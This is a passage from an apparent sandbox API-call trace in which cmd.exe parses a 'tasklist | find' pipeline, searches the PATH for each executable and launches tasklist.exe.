locale=".OCP") returned="English_United States.437" [0130.189] GetConsoleTitleW (in: lpConsoleTitle=0xdc4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0130.190] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0130.190] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0130.190] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0130.190] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0130.190] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0130.190] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0130.190] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0130.190] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0130.190] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0130.190] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0130.191] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0130.191] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0130.191] _wcsicmp (_String1="IF", _String2="find") returned 3 [0130.191] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0130.191] _wcsicmp (_String1="REM", _String2="find") returned 12 [0130.191] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0130.192] _pipe (in: _PtHandles=0xdc51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xdc51f0) returned 0 [0130.192] _dup (_FileHandle=1) returned 5 [0130.192] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0130.192] _close (_FileHandle=4) returned 0 [0130.192] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0130.192] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0130.192] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0130.192] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0130.192] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0130.192] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0130.192] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0130.192] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0130.192] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0130.192] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0130.192] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0130.192] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0130.193] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0130.193] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0130.193] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0130.193] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0130.193] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0130.193] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0130.193] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0130.193] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0130.193] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0130.193] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0130.193] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0130.193] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0130.193] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0130.193] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0130.193] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0130.193] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0130.193] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0130.193] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0130.193] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0130.194] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0130.194] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0130.194] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0130.194] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0130.194] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0130.194] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0130.194] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0130.194] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0130.194] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0130.194] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0130.194] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0130.194] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0130.194] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0130.194] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0130.194] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0130.194] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0130.194] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0130.194] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0130.194] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0130.194] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0130.194] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0130.194] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0130.194] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0130.194] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0130.194] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0130.194] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0130.194] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0130.194] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0130.194] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0130.194] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0130.194] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0130.194] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0130.194] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0130.194] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0130.194] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0130.194] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0130.194] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0130.194] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0130.195] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0130.195] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0130.195] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0130.195] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0130.195] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0130.195] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0130.195] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0130.195] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0130.195] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0130.195] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0130.195] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0130.195] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0130.195] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0130.195] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0130.195] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0130.195] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0130.195] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0130.195] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0130.195] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0130.195] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0130.195] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0130.195] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0130.195] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0130.195] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0130.195] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0130.195] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0130.195] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0130.195] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0130.195] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0130.195] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0130.195] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0130.195] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0130.195] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0130.195] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0130.195] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0130.195] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0130.195] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0130.195] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0130.195] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0130.195] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0130.195] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0130.195] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0130.196] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0130.196] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0130.196] SetErrorMode (uMode=0x0) returned 0x0 [0130.196] SetErrorMode (uMode=0x1) returned 0x0 [0130.196] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdc5228, lpFilePart=0xbefaf4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbefaf4*="Desktop") returned 0x1c [0130.196] SetErrorMode (uMode=0x0) returned 0x1 [0130.196] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.196] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.200] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.201] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xffffffff [0130.201] GetLastError () returned 0x2 [0130.201] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xdc5530 [0130.201] FindClose (in: hFindFile=0xdc5530 | out: hFindFile=0xdc5530) returned 1 [0130.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xffffffff [0130.201] GetLastError () returned 0x2 [0130.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xdc5530 [0130.201] FindClose (in: hFindFile=0xdc5530 | out: hFindFile=0xdc5530) returned 1 [0130.201] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.201] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.201] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0130.201] SetErrorMode (uMode=0x0) returned 0x0 [0130.201] SetErrorMode (uMode=0x1) returned 0x0 [0130.202] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdca3c0, lpFilePart=0xbef89c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef89c*="Desktop") returned 0x1c [0130.202] SetErrorMode (uMode=0x0) returned 0x1 [0130.202] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.202] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.202] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xffffffff [0130.202] GetLastError () returned 0x2 [0130.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xdc5628 [0130.202] FindClose (in: hFindFile=0xdc5628 | out: hFindFile=0xdc5628) returned 1 [0130.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xffffffff [0130.202] GetLastError () returned 0x2 [0130.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xdc5628 [0130.202] FindClose (in: hFindFile=0xdc5628 | out: hFindFile=0xdc5628) returned 1 [0130.202] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.203] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.203] GetConsoleTitleW (in: lpConsoleTitle=0xbefb24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.204] InitializeProcThreadAttributeList (in: lpAttributeList=0xbefa50, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbefa34 | out: lpAttributeList=0xbefa50, lpSize=0xbefa34) returned 1 [0130.204] UpdateProcThreadAttribute (in: lpAttributeList=0xbefa50, dwFlags=0x0, Attribute=0x60001, lpValue=0xbefa3c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbefa50, lpPreviousValue=0x0) returned 1 [0130.204] GetStartupInfoW (in: lpStartupInfo=0xbefa88 | out: lpStartupInfo=0xbefa88*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.204] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.204] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.205] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xbef9d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbefa24 | out: lpCommandLine="tasklist", lpProcessInformation=0xbefa24*(hProcess=0x64, hThread=0x60, dwProcessId=0x3ec, dwThreadId=0x40c)) returned 1 [0130.209] CloseHandle (hObject=0x60) returned 1 [0130.209] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.209] GetEnvironmentStringsW () returned 0xdc42d8* [0130.209] FreeEnvironmentStringsA (penv="=") returned 1 [0130.209] DeleteProcThreadAttributeList (in: lpAttributeList=0xbefa50 | out: lpAttributeList=0xbefa50) [0130.209] _get_osfhandle (_FileHandle=3) returned 0x54 [0130.209] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0130.209] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0130.209] _close (_FileHandle=5) returned 0 [0130.209] _dup (_FileHandle=0) returned 4 [0130.209] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0130.209] _close (_FileHandle=3) returned 0 [0130.209] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0130.209] SetErrorMode (uMode=0x0) returned 0x0 [0130.209] SetErrorMode (uMode=0x1) returned 0x0 [0130.209] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdc42e0, lpFilePart=0xbefaf4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbefaf4*="Desktop") returned 0x1c [0130.209] SetErrorMode (uMode=0x0) returned 0x1 [0130.210] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.210] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.210] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.210] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.210] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xffffffff [0130.210] GetLastError () returned 0x2 [0130.210] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.210] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xdc5628 [0130.210] FindClose (in: hFindFile=0xdc5628 | out: hFindFile=0xdc5628) returned 1 [0130.210] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xffffffff [0130.210] GetLastError () returned 0x2 [0130.210] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef880) returned 0xdc5628 [0130.210] FindClose (in: hFindFile=0xdc5628 | out: hFindFile=0xdc5628) returned 1 [0130.210] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.210] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.211] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0130.211] SetErrorMode (uMode=0x0) returned 0x0 [0130.211] SetErrorMode (uMode=0x1) returned 0x0 [0130.211] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdc4668, lpFilePart=0xbef89c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xbef89c*="Desktop") returned 0x1c [0130.211] SetErrorMode (uMode=0x0) returned 0x1 [0130.211] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.211] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.211] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xffffffff [0130.211] GetLastError () returned 0x2 [0130.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.211] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xdc04a0 [0130.212] FindClose (in: hFindFile=0xdc04a0 | out: hFindFile=0xdc04a0) returned 1 [0130.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xffffffff [0130.212] GetLastError () returned 0x2 [0130.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xbef628, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbef628) returned 0xdc04a0 [0130.212] FindClose (in: hFindFile=0xdc04a0 | out: hFindFile=0xdc04a0) returned 1 [0130.212] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.212] _wcsicmp (_String1=".EXE", _String2=".CMD") 